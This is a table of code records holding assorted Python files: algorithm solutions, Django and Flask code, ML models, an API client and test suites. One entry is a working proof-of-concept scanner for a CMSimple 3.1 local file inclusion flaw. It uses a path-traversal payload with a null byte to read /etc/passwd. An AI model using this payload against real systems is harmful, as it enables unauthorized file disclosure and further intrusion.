| id | content |
|---|---|
1708060
|
from typing import List

class Solution:
    def maxSubArray(self, nums: List[int]) -> int:
        # dp[i] is the maximum subarray sum that ends at index i
        dp = [0] * len(nums)
        dp[0] = nums[0]
        for i in range(1, len(nums)):
            dp[i] = max(nums[i], dp[i-1] + nums[i])
        # the answer is the best sum over all ending positions
        res = dp[0]
        for i in range(1, len(dp)):
            res = max(res, dp[i])
        return res
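# A minimal sketch of the same recurrence in O(1) extra space (Kadane's
# algorithm); it tracks only the best subarray ending at the current index.
def max_sub_array(nums):
    best = cur = nums[0]
    for x in nums[1:]:
        cur = max(x, cur + x)    # extend the running subarray or restart at x
        best = max(best, cur)    # best sum seen so far
    return best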
|
1708065
|
from datetime import datetime
from django.core.management import BaseCommand
from django.db import connection
from club.settings import POST_HOTNESS_PERIOD
from posts.models.post import Post
class Command(BaseCommand):
help = "Updates hotness rank"
def handle(self, *args, **options):
Post.objects.exclude(hotness=0).update(hotness=0)
with connection.cursor() as cursor:
cursor.execute("""
update posts
set hotness = coalesce(
(
select round(sum(
pow(
(%s - abs(extract(epoch from age(c.created_at, now())))) / 3600,
1.3
)
))
from (
select distinct on (author_id) created_at
from comments
where comments.post_id = posts.id
and is_deleted = false
and created_at > %s
order by author_id
) as c
)
, 0.0)
where is_visible = true
and last_activity_at > %s
""", [
POST_HOTNESS_PERIOD.total_seconds(),
datetime.utcnow() - POST_HOTNESS_PERIOD,
datetime.utcnow() - POST_HOTNESS_PERIOD,
])
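# For reference, a rough Python sketch of the per-post hotness the SQL above
# computes. Assumes `comment_ages_seconds` holds, for one comment per distinct
# author within POST_HOTNESS_PERIOD, that comment's age in seconds.
def hotness_for_post(comment_ages_seconds, period_seconds):
    return round(sum(
        ((period_seconds - age) / 3600) ** 1.3  # fresher comments weigh more
        for age in comment_ages_seconds
    ))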
|
1708070
|
import requests
import re
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''CMSimple 3.1 - Local File Inclusion''',
"description": '''Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.''',
"severity": "high",
"references": [
"https://www.exploit-db.com/exploits/5700"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2008", "lfi"],
}
# Vendor Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/index.php?sl=../../../../../../../etc/passwd%00"""
method = "GET"
data = """"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and (re.search(r"""root:.*:0:0:""",resp0.text)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be the same as poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
1708090
|
def precise(lexer, precise_token, parent_token):
# Due to a pygments bug [0], custom tokens will look bad
# with external styles. Until it is fixed upstream, we
# convey whether the client is using the pie style or not
# through the "precise" option and return more precise tokens
# depending on its value.
#
# [0]: https://github.com/pygments/pygments/issues/1986
if precise_token is None or not lexer.options.get("precise"):
return parent_token
else:
return precise_token
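# Hypothetical usage sketch: a custom lexer could pick the more specific token
# only when it was constructed with the "precise" option enabled. The custom
# token name below is illustrative, not part of this module.
from pygments.token import Name, Token

def choose_decorator_token(lexer):
    custom = Token.Name.CustomDecorator  # dynamically-created custom token type
    return precise(lexer, custom, Name.Decorator)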
|
1708121
|
from app import create_app, db
from app.models import User
application = create_app()
@application.shell_context_processor
def make_shell_context():
return {"db": db, "User": User}
if __name__ == "__main__":
application.run(port=5003, debug=True)
|
1708123
|
import mobula
import mobula.layers as L
import numpy as np
def go_eltwise(op):
a = np.array([1, 0, 6]).astype(float)
b = np.array([4, 5, 3]).astype(float)
print ("a: ", a)
print ("b: ", b)
data1 = L.Data(a)
data2 = L.Data(b)
coeffs = np.array([-1.0,1.2])
l = L.Eltwise([data1,data2], op = op, coeffs = coeffs)
l.reshape()
l.forward()
print ("Y: ", l.Y)
dY = np.array([7, 8, 9]).astype(float)
l.dY = dY
print ("dY: ", l.dY)
l.backward()
print ("dX: ", l.dX[0], l.dX[1])
c0, c1 = coeffs
if op == L.Eltwise.SUM:
Y = c0 * a + c1 * b
dX0 = c0 * dY
dX1 = c1 * dY
elif op == L.Eltwise.PROD:
Y = a * b * c0 * c1
dX0 = b * dY * c0 * c1
dX1 = a * dY * c0 * c1
elif op == L.Eltwise.MAX:
Y = np.max([c0*a,c1*b], 0)
i = np.argmax([c0*a,c1*b], 0)
dX0 = np.zeros(a.shape)
dX1 = np.zeros(b.shape)
dX0[i == 0] = dY[i == 0] * c0
dX1[i == 1] = dY[i == 1] * c1
print ("Y", l.Y, Y)
assert np.allclose(l.Y, Y)
assert np.allclose(l.dX[0], dX0)
assert np.allclose(l.dX[1], dX1)
def test_eltwise():
print ("TEST SUM")
go_eltwise(L.Eltwise.SUM)
print ("TEST PROD")
go_eltwise(L.Eltwise.PROD)
print ("TEST MAX")
go_eltwise(L.Eltwise.MAX)
|
1708125
|
from typing import List, Optional, Union, cast
import requests
from eip712_structs import make_domain
from eth_account import Account
from eth_account.messages import encode_defunct
from eth_typing import AnyAddress, ChecksumAddress, HexStr
from hexbytes import HexBytes
from web3 import Web3
from gnosis.eth import EthereumNetwork, EthereumNetworkNotSupported
from .order import Order, OrderKind
try:
from typing import TypedDict # pylint: disable=no-name-in-module
except ImportError:
from typing_extensions import TypedDict
try:
from functools import cache
except ImportError:
from functools import lru_cache
cache = lru_cache(maxsize=None)
class TradeResponse(TypedDict):
blockNumber: int
logIndex: int
orderUid: HexStr
buyAmount: str # Stringified int
sellAmount: str # Stringified int
sellAmountBeforeFees: str # Stringified int
owner: AnyAddress # Not checksummed
buyToken: AnyAddress
sellToken: AnyAddress
txHash: HexStr
class AmountResponse(TypedDict):
amount: str
token: AnyAddress
class ErrorResponse(TypedDict):
error_type: str
description: str
class GnosisProtocolAPI:
"""
Client for GnosisProtocol API. More info: https://docs.cowswap.exchange/
"""
settlement_contract_addresses = {
EthereumNetwork.MAINNET: "0x9008D19f58AAbD9eD0D60971565AA8510560ab41",
EthereumNetwork.RINKEBY: "0x9008D19f58AAbD9eD0D60971565AA8510560ab41",
EthereumNetwork.XDAI: "0x9008D19f58AAbD9eD0D60971565AA8510560ab41",
}
api_base_urls = {
EthereumNetwork.MAINNET: "https://protocol-mainnet.gnosis.io/api/v1/",
EthereumNetwork.RINKEBY: "https://protocol-rinkeby.gnosis.io/api/v1/",
EthereumNetwork.XDAI: "https://protocol-xdai.gnosis.io/api/v1/",
}
def __init__(self, ethereum_network: EthereumNetwork):
self.network = ethereum_network
if self.network not in self.api_base_urls:
raise EthereumNetworkNotSupported(
f"{self.network.name} network not supported by Gnosis Protocol"
)
self.domain_separator = self.build_domain_separator(self.network)
self.base_url = self.api_base_urls[self.network]
@classmethod
def build_domain_separator(cls, ethereum_network: EthereumNetwork):
return make_domain(
name="Gnosis Protocol",
version="v2",
chainId=str(ethereum_network.value),
verifyingContract=cls.settlement_contract_addresses[ethereum_network],
)
def get_fee(self, order: Order) -> int:
if order["kind"] == "sell":
amount = order["sellAmount"]
else:
amount = order["buyAmount"]
url = (
self.base_url
+ f'fee/?sellToken={order["sellToken"]}&buyToken={order["buyToken"]}'
f'&amount={amount}&kind={order["kind"]}'
)
result = requests.get(url).json()
if "amount" in result:
return int(result["amount"])
else:
return 0
def place_order(
self, order: Order, private_key: HexStr
) -> Union[HexStr, ErrorResponse]:
"""
Place order. If `feeAmount=0` in Order it will be calculated calling `get_fee(order)`
:return: UUID for the order as an hex hash
"""
assert (
order["buyAmount"] and order["sellAmount"]
), "Order buyAmount and sellAmount cannot be empty"
url = self.base_url + "orders/"
order["feeAmount"] = order["feeAmount"] or self.get_fee(order)
signable_bytes = order.signable_bytes(domain=self.domain_separator)
signable_hash = Web3.keccak(signable_bytes)
message = encode_defunct(primitive=signable_hash)
signed_message = Account.from_key(private_key).sign_message(message)
data_json = {
"sellToken": order["sellToken"].lower(),
"buyToken": order["buyToken"].lower(),
"sellAmount": str(order["sellAmount"]),
"buyAmount": str(order["buyAmount"]),
"validTo": order["validTo"],
"appData": HexBytes(order["appData"]).hex()
if isinstance(order["appData"], bytes)
else order["appData"],
"feeAmount": str(order["feeAmount"]),
"kind": order["kind"],
"partiallyFillable": order["partiallyFillable"],
"signature": signed_message.signature.hex(),
"signingScheme": "ethsign",
"from": Account.from_key(private_key).address,
}
r = requests.post(url, json=data_json)
if r.ok:
return HexStr(r.json())
else:
return ErrorResponse(r.json())
def get_trades(
self, order_ui: Optional[HexStr] = None, owner: Optional[ChecksumAddress] = None
) -> List[TradeResponse]:
assert bool(order_ui) ^ bool(
owner
), "order_ui or owner must be provided, but not both"
url = self.base_url + "trades/?"
if order_ui:
url += f"orderUid={order_ui}"
elif owner:
url += f"owner={owner}"
response = requests.get(url)
if response.ok:
return cast(List[TradeResponse], response.json())
else:
return []
def get_estimated_amount(
self,
base_token: ChecksumAddress,
quote_token: ChecksumAddress,
kind: OrderKind,
amount: int,
) -> Union[AmountResponse, ErrorResponse]:
"""
The estimated amount in quote token for either buying or selling amount of baseToken.
"""
url = self.base_url + f"markets/{base_token}-{quote_token}/{kind.name}/{amount}"
response = requests.get(url)
if response.ok:
return AmountResponse(response.json())
else:
return ErrorResponse(response.json())
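# Hedged usage sketch (not from this module): how the client above might be
# driven, assuming `order` is an already-built Order and the key is a hex string.
#
#   api = GnosisProtocolAPI(EthereumNetwork.RINKEBY)
#   order["feeAmount"] = 0                               # let place_order() fetch the fee
#   uid_or_error = api.place_order(order, private_key)   # order UID hex or ErrorResponse
#   trades = api.get_trades(owner=Account.from_key(private_key).address)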
|
1708138
|
import abc
import numpy as np
import six
import os
import tensorflow as tf
@six.add_metaclass(abc.ABCMeta)
class NeuralNetwork(object):
"""Abstract base class for Neural Network used in
policy-value net.
Details can be found in https://www.nature.com/articles/nature24270
'Mastering the game of Go without human knowledge'
"""
@abc.abstractmethod
def policyValueFunc(self, board):
pass
@abc.abstractmethod
def trainStep(self, state_batch, mcts_probs_batch, winner_batch, lr):
pass
@abc.abstractmethod
def save(self, path):
pass
@abc.abstractmethod
def restore(self, path):
pass
@abc.abstractproperty
def width(self):
pass
@abc.abstractproperty
def height(self):
pass
class SimpleCNN(NeuralNetwork):
def __init__(self, height, width, model_file=None, norm_weight=1e-4):
self.board_width = width
self.board_height = height
# Define the neural network
with tf.variable_scope("SimpleCNN"):
# input placeholders
# input states placeholder; the 4 channels are:
# board_state[0]: current board state with only the current player's stones
# board_state[1]: current board state with only the opponent's stones
# board_state[2]: a single stone marking the last move (made by the opponent)
# board_state[3]: indicates the player to move, 0 for white, 1 for black
self.raw_input_states = tf.placeholder(
tf.float32, shape=[None, 4, height, width])
# label contains the result of game
self.value_labels = tf.placeholder(tf.float32, shape=[None, 1])
# label contains the probability vector from MCTS for each step of game
self.mcts_probs_labels = tf.placeholder(
tf.float32, shape=[None, height*width])
self.learning_rate = tf.placeholder(tf.float32)
self.is_training = tf.placeholder(tf.bool)
# tensorflow like input with format [N,H,W,C]
self.input_states = tf.transpose(self.raw_input_states, [0, 2, 3, 1])
# Shared Layers
with tf.variable_scope("shared_layers"):
self.conv1 = tf.layers.conv2d(inputs=self.input_states,
filters=32, kernel_size=3,
padding="same", activation=tf.nn.relu,
name="conv1")
self.batchnorm1 = tf.layers.batch_normalization(self.conv1, training=self.is_training)
self.conv2 = tf.layers.conv2d(inputs=self.batchnorm1, filters=64,
kernel_size=3, padding="same",
activation=tf.nn.relu, name="conv2")
self.batchnorm2 = tf.layers.batch_normalization(self.conv2, training=self.is_training)
self.conv3 = tf.layers.conv2d(inputs=self.batchnorm2, filters=128,
kernel_size=3, padding="same",
activation=tf.nn.relu, name="conv3")
self.batchnorm3 = tf.layers.batch_normalization(self.conv3, training=self.is_training)
# Action net layers
with tf.variable_scope("action_layers"):
self.action_conv = tf.layers.conv2d(inputs=self.batchnorm3, filters=8,
kernel_size=1, padding="same",
activation=tf.nn.relu, name="action_conv")
self.action_conv_flat = tf.reshape(
self.action_conv, [-1, 8 * height * width])
self.action_out = tf.layers.dense(inputs=self.action_conv_flat,
units=height*width,
activation=tf.nn.softmax,
name="action_out")
self.action_out_log = tf.log(self.action_out)
# Value net layers
with tf.variable_scope("value_layers"):
self.value_conv = tf.layers.conv2d(inputs=self.batchnorm3, filters=2,
kernel_size=1, padding="same",
activation=tf.nn.relu, name="value_conv")
self.value_conv_flat = tf.reshape(
self.value_conv, [-1, 2 * height * width]
)
self.value_fc = tf.layers.dense(inputs=self.value_conv_flat, units=64,
activation=tf.nn.relu, name="value_fc")
self.value_out = tf.layers.dense(inputs=self.value_fc, units=1,
activation=tf.nn.tanh, name="value_out")
# losses
self.value_loss = tf.losses.mean_squared_error(
self.value_labels, self.value_out)
self.policy_loss = tf.negative(tf.reduce_mean(tf.reduce_sum(tf.multiply(
self.mcts_probs_labels, self.action_out_log), 1)))
trainable_vars = tf.trainable_variables()
self.l2_norm_weight = norm_weight
l2_norm = norm_weight * tf.add_n(
[tf.nn.l2_loss(v) for v in trainable_vars if ('bias' not in v.name.lower() and
'moving' not in v.name.lower())])
self.loss = self.value_loss + self.policy_loss + l2_norm
self.entropy = tf.negative(tf.reduce_mean(
tf.reduce_sum(self.action_out * tf.log(self.action_out), -1)
))
# train op part
self.optimizer = tf.train.AdamOptimizer(
learning_rate=self.learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
self.train_op = self.optimizer.minimize(self.loss)
self.global_step = tf.get_variable("global_step", initializer=0, trainable=False)
# increment the step counter when this op is run
self.step_add_op = tf.assign_add(self.global_step, 1)
# session
self.session = tf.Session()
self.session.run(tf.global_variables_initializer())
# Saver
self.saver = tf.train.Saver()
if model_file is not None:
self.restore(model_file)
def restore(self, model_path):
dir_path = os.path.dirname(model_path)
self.saver.restore(self.session, tf.train.latest_checkpoint(dir_path))
def save(self, model_path):
global_step = self.getGlobalStep()
dir_path = os.path.dirname(model_path)
if not tf.gfile.Exists(dir_path):
tf.gfile.MakeDirs(dir_path)
self.saver.save(self.session, model_path, global_step=global_step)
def getPolicyValue(self, state_batch):
act_prob, value = self.session.run(
[self.action_out, self.value_out],
feed_dict={self.raw_input_states: state_batch, self.is_training: False}
)
return act_prob, value
def policyValueFunc(self, board):
"""The Policy-value function.
This function takes a board state and return evaluation value
and next_action probability vector.
"""
valid_positions = board.availables
current_state = np.ascontiguousarray(board.currentState().reshape(
-1, 4, self.board_height, self.board_width))
policy_vec, value = self.getPolicyValue(current_state)
# 0 because getPolicyValue takes batch of data
policy_vec = zip(valid_positions, policy_vec[0][valid_positions])
return policy_vec, value
def trainStep(self, state_batch, mcts_probs_batch, winner_batch, lr):
"""Perform single training step.
Args:
state_batch: A numpy array of board state used as the training data.
mcts_probs_batch: A numpy array of action probability vectors
used as training label.
winner_batch: A numpy array of game result used as training label.
lr: learning rate.
"""
winner_batch = np.reshape(winner_batch, (-1, 1))
loss, _, _, entropy = self.session.run(
[self.loss, self.train_op, self.step_add_op, self.entropy],
feed_dict={self.raw_input_states: state_batch,
self.mcts_probs_labels: mcts_probs_batch,
self.value_labels: winner_batch,
self.learning_rate: lr,
self.is_training: True})
return loss, entropy
def getGlobalStep(self):
global_step = self.session.run(self.global_step)
return global_step
@property
def width(self):
return self.board_width
@property
def height(self):
return self.board_height
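# Minimal smoke-test sketch (an assumption, not part of the original module):
# build a small net and run one training step on random data in a TF1 session.
if __name__ == "__main__":
    h = w = 6
    net = SimpleCNN(height=h, width=w)
    states = np.random.rand(4, 4, h, w).astype(np.float32)   # batch of 4 fake board states
    probs = np.random.dirichlet(np.ones(h * w), size=4)      # fake MCTS visit distributions
    winners = np.random.choice([-1.0, 1.0], size=4)          # fake game results
    loss, entropy = net.trainStep(states, probs, winners, lr=1e-3)
    print("loss:", loss, "entropy:", entropy)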
|
1708142
|
import socket
import json
def main():
serversocket = socket.socket()
host = "localhost"
port = 23456
serversocket.bind((host, port))
serversocket.listen(1)
while True:
s, addr = serversocket.accept()
msg = s.recv(1024).decode("utf-8")#[1:]
print(msg)
msgJson = json.loads(msg)
response = processResponse(msgJson["request"])
sendJson = {"id": msgJson["id"], "response": response}
response = json.dumps(sendJson)
print(response)
sendResponse(response)
s.close()
def sendResponse(msg):
s = socket.socket()
host = "localhost"
port = 12345
s.connect((host, port))
s.send(msg.encode('utf-8'))
s.close()
def processResponse(requestString):
return requestString
if __name__ == '__main__':
main()
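# Hedged client sketch for manual testing (run from a separate process while the
# relay above is running): send a request to port 23456 and wait on port 12345
# for the echoed response, matching the ports hard-coded above.
def send_request(request, request_id=1):
    listener = socket.socket()
    listener.bind(("localhost", 12345))
    listener.listen(1)
    out = socket.socket()
    out.connect(("localhost", 23456))
    out.send(json.dumps({"id": request_id, "request": request}).encode("utf-8"))
    out.close()
    conn, _ = listener.accept()
    print(conn.recv(1024).decode("utf-8"))
    conn.close()
    listener.close()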
|
1708158
|
import unittest
import os
import fv3gfs.wrapper
from util import get_default_config, main
test_dir = os.path.dirname(os.path.abspath(__file__))
rundir = os.path.join(test_dir, "rundir")
class TracerMetadataTests(unittest.TestCase):
def test_tracer_index_is_one_based(self):
data = fv3gfs.wrapper.get_tracer_metadata()
indexes = []
for entry in data.values():
self.assertIn("i_tracer", entry)
indexes.append(entry["i_tracer"])
indexes = sorted(indexes)
self.assertEqual(indexes[0], 1)
self.assertEqual(indexes[-1], len(indexes))
self.assertEqual(
len(indexes), len(set(indexes))
) # test there are no duplicates
def test_tracer_metadata_has_all_keys(self):
data = fv3gfs.wrapper.get_tracer_metadata()
for name, metadata in data.items():
with self.subTest(msg=name):
self.assertIn("units", metadata)
self.assertIn("i_tracer", metadata)
self.assertIn("fortran_name", metadata)
self.assertIn("restart_name", metadata)
self.assertIn("is_water", metadata)
self.assertIn("dims", metadata)
self.assertIsInstance(metadata["units"], str)
self.assertIsInstance(metadata["i_tracer"], int)
self.assertIsInstance(metadata["fortran_name"], str)
self.assertIsInstance(metadata["is_water"], bool)
self.assertIsInstance(metadata["restart_name"], str)
self.assertIsInstance(metadata["dims"], list)
def test_all_tracers_present(self):
tracer_names = [
"specific_humidity",
"cloud_water_mixing_ratio",
"rain_mixing_ratio",
"cloud_ice_mixing_ratio",
"snow_mixing_ratio",
"graupel_mixing_ratio",
"ozone_mixing_ratio",
"cloud_amount",
]
data = fv3gfs.wrapper.get_tracer_metadata()
self.assertEqual(set(data.keys()), set(tracer_names))
def test_ozone_not_water(self):
data = fv3gfs.wrapper.get_tracer_metadata()
self.assertFalse(data["ozone_mixing_ratio"]["is_water"])
def test_specific_humidity_is_water(self):
data = fv3gfs.wrapper.get_tracer_metadata()
self.assertTrue(data["specific_humidity"]["is_water"])
def test_all_tracers_in_restart_names(self):
tracer_names = [
"specific_humidity",
"cloud_water_mixing_ratio",
"rain_mixing_ratio",
"cloud_ice_mixing_ratio",
"snow_mixing_ratio",
"graupel_mixing_ratio",
"ozone_mixing_ratio",
"cloud_amount",
]
restart_names = fv3gfs.wrapper.get_restart_names()
missing_names = set(tracer_names).difference(restart_names)
self.assertEqual(len(missing_names), 0)
if __name__ == "__main__":
config = get_default_config()
config[
"initial_conditions"
] = "gs://vcm-fv3config/data/initial_conditions/c12_restart_initial_conditions/v1.0"
config["namelist"]["fv_core_nml"]["external_ic"] = False
config["namelist"]["fv_core_nml"]["nggps_ic"] = False
config["namelist"]["fv_core_nml"]["make_nh"] = False
config["namelist"]["fv_core_nml"]["mountain"] = True
config["namelist"]["fv_core_nml"]["warm_start"] = True
config["namelist"]["fv_core_nml"]["na_init"] = 0
main(test_dir, config)
|
1708226
|
from dataclasses import asdict
from functools import wraps
import json
from protobuf_to_dict import protobuf_to_dict
from dacite import from_dict
from schemes.graph import GraphNode, GraphRelation
from configs.config import logger
def raise_customized_error(capture, target):
def _raise_customized_error(func):
@wraps(func)
def wapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except capture:
raise target
return wapper
return _raise_customized_error
def raise_grpc_error(capture, grpc_status_code):
def _raise_grpc_error(func):
@wraps(func)
def wrapper(self, request, context):
try:
return func(self, request, context)
except capture as e:
context.set_code(grpc_status_code)
if hasattr(e, "desc"):
context.set_details(e.desc)
else:
context.set_details("Maybe RPC Error.")
return wrapper
return _raise_grpc_error
def deco_log_error(logger):
def _deco_log_error(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
if logger:
logger.exception(e)
raise e
# return {"errors": {"code": e.code, "desc": e.desc}}
return wrapper
return _deco_log_error
def convert_node_to_graphnode(node):
label = str(node.labels)[1:]
dct = dict(node)
name = dct.pop("name")
gn = GraphNode(label, name, dct)
return gn
def convert_relation_to_graph_relation(relation):
start = convert_node_to_graphnode(relation.start_node)
end = convert_node_to_graphnode(relation.end_node)
kind = list(relation.types())[0]
props = dict(relation)
gr = GraphRelation(start, end, kind, props)
return gr
def convert_query_to_scheme():
def _convert_query_to_scheme(func):
@wraps(func)
def wrapper(self, qin, **kwargs):
query = func(self, qin, **kwargs)
result = []
for gobj in query:
if gobj.relationships:
obj = convert_relation_to_graph_relation(gobj)
else:
obj = convert_node_to_graphnode(gobj)
result.append(obj)
return result
return wrapper
return _convert_query_to_scheme
def convert_request_to(target):
"""
convert different kinds of request to needed input.
there are 4 needed inputs:
- GraphNode
- GraphRelation
- RawString
- ExtractorInput
"""
def _convert_request_to(func):
@wraps(func)
def wrapper(self, request, context):
dctreq = protobuf_to_dict(request)
if "props" in dctreq:
req_props = dctreq["props"]
dctreq["props"] = json.loads(req_props)
if "start" in dctreq:
start_props = dctreq["start"]["props"]
dctreq["start"]["props"] = json.loads(start_props)
if "end" in dctreq:
end_props = dctreq["end"]["props"]
dctreq["end"]["props"] = json.loads(end_props)
request = from_dict(target, dctreq)
result = func(self, request, context)
return result
return wrapper
return _convert_request_to
def convert_graphobj_to_dict(graphobj):
"""
A graphobj is a GraphNode or GraphRelation
"""
dct = asdict(graphobj)
if "props" in dct:
dct["props"] = json.dumps(dct["props"])
if "start" in dct:
start_props = dct["start"]["props"]
dct["start"]["props"] = json.dumps(start_props)
if "end" in dct:
end_props = dct["end"]["props"]
dct["end"]["props"] = json.dumps(end_props)
return dct
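# Hedged example (field names assumed from the GraphNode(label, name, props)
# constructor used above): convert_graphobj_to_dict serializes the props mapping
# to a JSON string so it can travel through the gRPC layer.
#
#   gn = GraphNode("Person", "alice", {"age": 30})
#   convert_graphobj_to_dict(gn)
#   # -> {"label": "Person", "name": "alice", "props": '{"age": 30}'}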
|
1708249
|
import copy
from membase.helper.cluster_helper import ClusterOperationHelper
from couchbase_helper.documentgenerator import BlobGenerator
from .xdcrnewbasetests import XDCRNewBaseTest
from .xdcrnewbasetests import NodeHelper
from .xdcrnewbasetests import Utility, BUCKET_NAME, OPS
from remote.remote_util import RemoteMachineShellConnection
from lib.memcached.helper.data_helper import MemcachedClientHelper
from membase.api.rest_client import RestConnection
# Assumes at least 2 nodes on every cluster
class bidirectional(XDCRNewBaseTest):
def setUp(self):
super(bidirectional, self).setUp()
self.src_cluster = self.get_cb_cluster_by_name('C1')
self.src_master = self.src_cluster.get_master_node()
self.dest_cluster = self.get_cb_cluster_by_name('C2')
self.dest_master = self.dest_cluster.get_master_node()
def tearDown(self):
super(bidirectional, self).tearDown()
def __perform_ops_joint_sets(self):
# Merging the keys as keys are actually replicated.
temp_expires = self._expires
self._expires = 0  # Set to 0 so that merge_buckets doesn't wait for expiration here.
self.merge_all_buckets()
tasks = []
kv_gen_src = self.src_cluster.get_kv_gen()[OPS.CREATE]
gen_update = BlobGenerator(kv_gen_src.name,
kv_gen_src.seed,
kv_gen_src.value_size,
start=0,
end=int(kv_gen_src.end * (float)(self._perc_upd) / 100))
gen_delete = BlobGenerator(kv_gen_src.name,
kv_gen_src.seed,
kv_gen_src.value_size,
start=int((kv_gen_src.end) * (float)(100 - self._perc_del) / 100),
end=kv_gen_src.end)
if "C1" in self._upd_clusters:
tasks += self.src_cluster.async_load_all_buckets_from_generator(gen_update, OPS.UPDATE, self._expires)
if "C2" in self._upd_clusters:
tasks += self.dest_cluster.async_load_all_buckets_from_generator(gen_update, OPS.UPDATE, self._expires)
if "C1" in self._del_clusters:
tasks += self.src_cluster.async_load_all_buckets_from_generator(gen_delete, OPS.DELETE, 0)
if "C2" in self._del_clusters:
tasks += self.dest_cluster.async_load_all_buckets_from_generator(gen_delete, OPS.DELETE, 0)
for task in tasks:
task.result()
self._expires = temp_expires
if (self._wait_for_expiration and self._expires) and ("C1" in self._upd_clusters or "C2" in self._upd_clusters):
self.sleep(self._expires)
self.sleep(self._wait_timeout)
"""Bidirectional replication between two clusters(currently), create-updates-deletes on DISJOINT sets on same bucket."""
def load_with_ops(self):
self.setup_xdcr_and_load()
self.perform_update_delete()
self.verify_results()
"""Bidirectional replication between two clusters(currently), create-updates-deletes on DISJOINT sets on same bucket.
Here running incremental load on both cluster1 and cluster2 as specified by the user/conf file"""
def load_with_async_ops(self):
self.setup_xdcr_and_load()
self.async_perform_update_delete()
self.verify_results()
"""Testing Bidirectional load( Loading at source/destination). Failover node at Source/Destination while
Create/Update/Delete are performed in parallel based on doc-ops specified by the user.
Verifying whether XDCR replication is successful on subsequent destination clusters. """
def load_with_async_ops_and_joint_sets(self):
self.setup_xdcr_and_load()
self.async_perform_update_delete()
self.verify_results()
def load_with_async_ops_with_warmup(self):
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node())
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node())
self.sleep(self._wait_timeout)
NodeHelper.wait_warmup_completed(warmupnodes)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
self.verify_results()
def load_with_async_ops_with_warmup_master(self):
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node(master=True))
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node(master=True))
self.sleep(self._wait_timeout)
NodeHelper.wait_warmup_completed(warmupnodes)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
self.verify_results()
def load_with_async_ops_and_joint_sets_with_warmup(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
"Test case does not apply for Ephemeral buckets"
return
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node())
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node())
self.sleep(self._wait_timeout)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
NodeHelper.wait_warmup_completed(warmupnodes)
self.verify_results()
def load_with_async_ops_and_joint_sets_with_warmup_master(self):
self.setup_xdcr_and_load()
warmupnodes = []
if "C1" in self._warmup:
warmupnodes.append(self.src_cluster.warmup_node(master=True))
if "C2" in self._warmup:
warmupnodes.append(self.dest_cluster.warmup_node(master=True))
self.sleep(self._wait_timeout)
self.async_perform_update_delete()
self.sleep(self._wait_timeout // 2)
NodeHelper.wait_warmup_completed(warmupnodes)
self.verify_results()
def load_with_failover(self):
self.setup_xdcr_and_load()
if "C1" in self._failover:
self.src_cluster.failover_and_rebalance_nodes()
if "C2" in self._failover:
self.dest_cluster.failover_and_rebalance_nodes()
self.sleep(self._wait_timeout // 6)
self.perform_update_delete()
self.sleep(300)
self.verify_results()
def load_with_failover_then_add_back(self):
self.setup_xdcr_and_load()
if "C1" in self._failover:
self.src_cluster.failover_and_rebalance_nodes(rebalance=False)
self.src_cluster.add_back_node()
if "C2" in self._failover:
self.dest_cluster.failover_and_rebalance_nodes(rebalance=False)
self.dest_cluster.add_back_node()
self.perform_update_delete()
self.verify_results()
def load_with_failover_master(self):
self.setup_xdcr_and_load()
if "C1" in self._failover:
self.src_cluster.failover_and_rebalance_master()
if "C2" in self._failover:
self.dest_cluster.failover_and_rebalance_master()
self.sleep(self._wait_timeout // 6)
self.perform_update_delete()
self.verify_results()
"""Replication with compaction ddocs and view queries on both clusters.
This test begins by loading a given number of items on both clusters.
It creates _num_views as development/production view with default
map view funcs(_is_dev_ddoc = True by default) on both clusters.
Then we disabled compaction for ddoc on src cluster. While we don't reach
expected fragmentation for ddoc on src cluster we update docs and perform
view queries for all views. Then we start compaction when fragmentation
was reached fragmentation_value. When compaction was completed we perform
a full verification: wait for the disk queues to drain
and then verify that there has been no data loss on both clusters."""
def replication_with_ddoc_compaction(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
self.log.info("Test case does not apply to ephemeral")
return
self.setup_xdcr()
self.src_cluster.load_all_buckets(self._num_items)
self.dest_cluster.load_all_buckets(self._num_items)
num_views = self._input.param("num_views", 5)
is_dev_ddoc = self._input.param("is_dev_ddoc", True)
fragmentation_value = self._input.param("fragmentation_value", 80)
for bucket in self.src_cluster.get_buckets():
views = Utility.make_default_views(bucket.name, num_views, is_dev_ddoc)
ddoc_name = "ddoc1"
prefix = ("", "dev_")[is_dev_ddoc]
query = {"full_set": "true", "stale": "false"}
tasks = self.src_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
